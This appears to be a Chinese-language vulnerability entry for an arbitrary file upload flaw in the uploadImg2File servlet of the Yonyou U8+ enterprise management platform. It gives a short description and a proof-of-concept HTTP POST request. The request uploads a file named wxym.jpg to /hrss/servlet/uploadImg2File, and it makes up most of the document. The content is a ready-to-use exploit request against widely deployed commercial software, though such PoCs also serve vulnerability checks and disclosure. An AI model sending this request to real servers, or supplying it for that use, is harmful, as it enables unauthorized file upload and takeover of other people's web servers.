漏洞描述
用友U8+ 是用友网络科技股份有限公司旗下一款成长型企业构建精细管理、产业链协同、社交化运营为一体的企业互联网经营管理平台。用友U8 uploadImg2File 存在文件上传漏洞。攻击者可通过该漏洞在服务器端上传恶意文件,获取服务器权限,进而控制整个web服务器。
用友U8 uploadImg2File 任意文件上传
PoC代码
POST /hrss/servlet/uploadImg2File HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Length: 185
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhedgunua
Cookie:
Accept-Encoding: gzip
------WebKitFormBoundaryhedgunua
Content-Disposition: form-data; name="file"; filename="wxym.jpg"
Content-Type: application/octet-stream
43814
------WebKitFormBoundaryhedgunua--